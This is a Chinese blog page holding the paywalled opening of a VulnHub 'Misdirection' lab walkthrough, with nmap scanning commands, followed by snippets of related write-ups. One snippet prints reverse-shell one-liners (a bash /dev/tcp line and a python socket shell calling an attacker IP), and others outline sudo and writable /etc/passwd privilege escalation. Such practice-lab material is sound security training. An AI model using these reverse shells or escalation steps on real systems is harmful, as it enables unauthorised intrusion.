红队打靶:Misdirection打靶思路详解(vulnhub)

最新推荐文章于 2024-12-13 11:53:27 发布
原创 最新推荐文章于 2024-12-13 11:53:27 发布 · 1.9k 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #vulnhub #kali #网络安全 #linux

目录

写在开头

第一步:主机发现与端口扫描 

第二步:Web渗透(80端口,战术放弃)

第三步:Web渗透(8080端口)

第四步:sudo bash提权 

第五步:/etc/passwd利用提权

总结与思考

写在开头

   本篇博客在自己的理解之上根据大佬红队笔记的视频进行打靶,详述了打靶的每一步思路,并非复现writeup,读者耐心看完,定会有所收获。Misdirection靶机也很简单,对于我们的启发就是渗透优先级的选择,当遇到攻击面暴露较多的路径时,可以先放一放,避免走进死胡同死磕不得解,应当优先渗透相对容易的方向或容易尝试的方向。本文涉及到的知识点包括:信息收集的技巧、常见反弹shell语句、sudo bash提权、viminfo敏感信息、/etc/passwd可写提权等,完整的打靶思路详见:

「红队笔记」靶机精讲:Misdirection - 渗透目标选择的优先级很重要,死磕一处和快速跳跃的权衡和智慧。_哔哩哔哩_bilibili

  本文针对的靶机源于vulnhub,详情见: 

Misdirection: 1 ~ VulnHub

 下载链接见:

https://download.vulnhub.com/misdirection/Misdirection.zip

  这个靶机好像用VMware和Virtual Box都可以,我就用VMware了,将靶机的网络设置为NAT模式,靶机打开如下图所示: 

第一步:主机发现与端口扫描 

  常规思路,这里不细讲了。我kali的ip是10.10.10.128,主机发现靶机的ip是10.10.10.155,扫描出开放的TCP端口仅有22,80,3306和8080,具体命令如下:

nmap -sn 10.10.10.0/24    //主机发现
nmap -sT --min-rate 10000 10.10.10.155      //TCP全端口扫描
nmap -sT -sC -sV -O -p22,80,3306,8080 10.10.10.155      //用默认脚本扫描服务信息、操作系统版本
nmap --script=vuln -p22,80,3306,8080 10.10.10.155  //漏洞脚本扫描
nmap -sU --top-ports 20 10.10.10.155    //探测UDP最常见的20个端口的开放情况

最低0.47元/天 解锁文章
vulnhub靶机Misdirection
0of_blog
05-01 902
x 是密码占位符,表示密码已加密并存储在 /etc/shadow 文件中;UID 是新用户的 UID,可以选择一个未被占用的数字(建议从 1000 开始);/home/username 是用户的家目录;/bin/bash 是用户的默认 shell。www-data用户允许在localhost上以brexit用户身份执行/bin/bash命令,因此我们可以利用这个漏洞来提权为brexit用户。注意到viminfo中有对/etc/passwd的操作,查看权限。是个仿真终端,查看了一下基本信息,只有低权限身份。
Misdirection 1--VulnHub系列学习记录
weixin_45509443的博客
07-25 410
了解openssl工具 通过 /etc/passwd 提权 了解Metasploit的 Web Delivery Scrip 反弹shell 了解收集非常见反弹shell命令方式
“突破重围:探索OSCP渗透测试场景中的难题与解决方案“
A485860941的博客
07-17 1411
在OSCP渗透测试认证中,靶场红队是极具挑战性和实战性的对手,他们不仅拥有深厚的安全知识和技能,还能模拟真实世界中的攻击场景。本文将探索OSCP靶场中超级厉害的红队,介绍他们的攻击策略和技术手段,并分享一些应对策略和解决方案,帮助渗透测试人员更好地应对实际攻击。
Vulnhub靶机:MISDIRECTION_ 1
LainWith的博客
01-06 1144
系列:Misdirection(此系列共1台) 发布日期:2019 年 9 月 24 日 难度:初级 运行环境:官方推荐Virtualbox,我使用的是VMware 补充:靶机容易被干崩,下手轻点 目标:取得 root 权限 学习:靶机地址:https://www.vulnhub.com/entry/misdirection-1,371/netdiscover主机发现 主机信息探测 nmap发现了一些有趣的目录,疑似发现了sql注入,经核实为误报 80端口常规探测没有发现什么有趣的信息,但是nmap发现了8
Vulnhub-靶机-Misdirection 1
qq_43264813的博客
01-27 784
Vulnhub—靶机—Misdirection 1 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/symfonos-52,415/ 文章目录Vulnhub—靶机—Misdirection 1一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址: 【命令】nmap -sP 192.168.110.0/24 【步骤二】对目标靶机进行全
红队打靶:Narak打靶思路详解vulnhub
Bossfrank的博客
09-02 1891
本文是vulnhub靶机Narak的详细打靶过程,涉及到的知识点包括tftp协议的使用、dav工具的使用、brainfuck语句和motd脚本提权等。知识点很密,需要实操打靶才会有深刻理解。。
红队打靶:Nyx: 1打靶思路详解vulnhub
Bossfrank的博客
10-14 1813
本文是vulnhub靶机Nyx: 1的详细打靶过程。靶机非常简单,涉及到的知识点主要有:nmap漏洞扫描、ssh私钥登录、sudo提权等。难点可能在于不要遗漏信息、也不要掉进陷阱。。
红队打靶:Troll1打靶思路详解vulnhub
Bossfrank的博客
07-06 1838
本文是vulnhub靶机Troll的详细打靶过程。涉及到的知识点包括FTP匿名登录、strings命令、密码喷射crackmapexec、定时任务提权等。靶机本身不复杂,但关键是有一些命令的操作。包括strings查看文件的文本信息、binwalk查看捆绑文件、file命令查看文件信息。如果不使用这些命令,可能会遗漏很多重要信息。
红队打靶:JARBAS详细打靶思路vulnhub
Bossfrank的博客
06-03 3794
本文是vulnhub靶机JARBAS详细打靶过程,使用kali进行渗透。不同于单纯的writeup,本文详细提供了渗透的思路和每一步的用意。
靶机渗透之Misdirection
weixin_64267091的博客
03-04 1226
这个靶场难度一般,主要是从8080端口下手,如果刚开始从80端口入手,肯定很难,需要花费很长时间才能走出。这里主要是在目录扫描和漏洞扫描阶段 得知了8080端口的一些目录,然后后续才从这个端口下手。然后打开/debug/发现有命令执行的shell cmd页面,然后就反弹shell。接着就进入到提权阶段,首先使用Sudo -l检查www-data用户的sudo权限,发现有一个brexit用户,不需要密码直接利用sudo就可以拿到权限,但是这个只是普通用户的权限,还需进行提权。
Misdirection靶机
ybkj6666的博客
11-15 397
先找靶机的ip。
Vulnhub:Misdirection 1靶机
qq_43884092的博客
04-17 252
8080端口/debug目录,是一个可以执行命令的shell,bash和写入用户提权
vulnhub靶机3(easy难度):misdirection(打点一秒钟,提权三小时)
anddddoooo的博客
09-08 1350
这台靶机的名字叫“误导”,字如其名,无数信息看似敏感实则无用。
红队靶机渗透-W1R3S 1.0.1
m0_57967573的博客
04-29 2133
nmap扫描获得了系统的4个端口,21,22,80,3306,都是标准的服务端口;对4个端口排布之后,先看了匿名的FTP,获得了若干文件文件,逐一查看,该破解的破解,该做字符处理的字符处理;然后看了3306是禁止连接的;80端口先是目录爆破,得到3个目录wordpress、javascript、administrator,javascript是无法访问的,因为wordpress的路径问题当时没有配置成功,需要做大的调整,所以暂时放弃了这条路······
vulnstack1--红队靶机(域渗透)
tlovejr的博客
04-27 4379
一、前言 这几天一直有点任务,就一直没来得更新,现在继续给大家更新一些贴近真实情况的靶场环境,今天的文章或许会有点长,因为有好多和我一样的小白,所以在这就多墨迹几句,有什么不对的还请大佬们给予批评指正 二、靶场前准备 首先做靶场前先需要做一些准备 1、下载靶场镜像文件 这步就没什么过多介绍的 链接:https://pan.baidu.com/s/1lElVlUfEovffRWWOCktdVQ?pwd=6666 提取码:6666 2、修改各个靶机登录密码 因为第一次登录不修改密码的话,第二次开机时,原
vulnstack1--红队靶机
niqiu320的博客
05-31 670
思路流程: 环境搭建(靶机环境) 一、前渗透的阶段 首先信息收集 getshell 尝试内网信息收集 二、后渗透阶段 (一)msf和cs联动 内网信息收集 三、攻击域(内网渗透) (一)提权 (二)横向移动 攻击域控 ...
Misdirection(VulnHub)
carmi的博客
02-03 426
Misdirection nmap扫描 目录爆破 80小探索 searchsploit 无果 8080端口渗透 反弹shell bash -i >& /dev/tcp/192.168.2.228/11111 0>&1 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF...
vulnhub靶场——misdirection
最新发布
2302_81105681的博客
12-13 376
下载链接:https://download.vulnhub.com/misdirection/Misdirection.zip我的攻击机kali和靶机都在172.16.8.0/24网段nmap扫描:172.16.8.0/24发现靶机IP为172.16.8.136,并且开放了22,80,3306,8080端口,首先访问一下http服务经过一番目录扫描后没有发现有用的线索使用nmap漏洞扫描功能试试nmap --script=vuln 靶机IP在8080端口扫描的结果中发现/debug/: Potentiall
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Boss_frank

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值